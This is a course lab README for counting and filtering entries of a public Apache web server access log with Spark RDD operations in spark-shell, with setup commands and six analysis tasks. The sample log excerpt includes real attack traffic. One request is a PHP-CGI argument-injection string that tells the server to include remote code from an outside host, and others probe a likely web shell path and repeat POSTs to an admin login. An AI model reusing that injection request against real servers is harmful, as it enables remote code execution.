# Lab 4: Implementing RDD operations using spark-shell

## Preparation
- Clone this repo and move to the downloaded folder

```terminal
git clone https://gitlab.com/liesner/bts-rtda-lab-4.git
cd bts-rtda-lab-4
```

Note: "Mac" people :-), remember to modify your docker-compose.yaml with your class finding.    

- Download ```access.log``` file on ```bts-rtda-lab-4``` 
```
curl http://www.almhuette-raith.at/apache-log/access.log -o access.log
```

- Run the spark container
```
docker-compose run spark bash
```

-  Take a look of the structure on ```access.log``` file, locate on ```/appdata``` folder inside de container.

```
> tail /appdata/access.log 
193.106.31.130 - - [08/May/2019:03:44:48 +0200] "POST /administrator/index.php HTTP/1.0" 200 4481 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "-"
193.106.31.130 - - [08/May/2019:03:44:48 +0200] "POST /administrator/index.php HTTP/1.0" 200 4481 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "-"
193.106.31.130 - - [08/May/2019:03:44:48 +0200] "POST /administrator/index.php HTTP/1.0" 200 4481 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "-"
5.188.211.100 - - [08/May/2019:03:48:38 +0200] "GET /apache-log/access.log HTTP/1.1" 200 85953320 "-" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0" "-"
5.188.211.100 - - [08/May/2019:03:48:39 +0200] "GET / HTTP/1.1" 200 10479 "-" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0" "-"
66.249.66.213 - - [08/May/2019:04:00:35 +0200] "GET / HTTP/1.1" 200 10479 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
82.102.21.211 - - [08/May/2019:04:05:45 +0200] "GET /templates/system/4ehai.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0" "-"
69.164.217.78 - - [08/May/2019:04:42:24 +0200] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://www.nghiemphat.com/go.txt HTTP/1.1" 200 10439 "-" "LWP::Simple/6.00 libwww-perl/6.08" "-"
2.138.251.143 - - [08/May/2019:04:42:29 +0200] "GET /favicon.ico HTTP/1.1" 404 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0" "-"
2.138.251.143 - - [08/May/2019:04:42:31 +0200] "GET /apache-log/access.log HTTP/1.1" 200 1468960 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0" "-"

``` 

```access.log``` came from a real publicly accessible access log of a web sever. Each line contain a log entry that contain information of a single access to the web server.


- Execute ```spark-shell``` to do the assignment
```
spark-shell --master local[2]
``` 


## Assignments (Using spark-shell and RDD api to do parallel analytic)

1- Load all lines from ```/appdata/access.log``` and count the total amount of log entries (each line of the file correspond to a log entry). 

2- Load all lines from ```/appdata/access.log```  and count the numbers of entries that correspond to a call done from a ```Chrome``` browser.  

3- Load all lines from ```/appdata/access.log``` and calculate the percentage of ```GET``` log entries.

4- Load all lines from ```/appdata/access.log``` and calculate the percentage of access with response status code of ```200``` (success).

Note: Taking the las line if the file in the previous example:
```
[08/May/2019:04:42:31 +0200] "GET /apache-log/access.log HTTP/1.1" 200 1468960 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0" "-"
```
The status code of the access came right after the ```http``` request ```"GET /apache-log/access.log HTTP/1.1"```.

5- Load all lines from  ```/appdata/access.log``` and find witch IP have more log entries.

6- Load all lines from  ```/appdata/access.log``` and find how many access were made on january of 2019.

Note: Take as reference of RDD API [Spark docs](https://spark.apache.org/docs/2.4.0/rdd-programming-guide.html)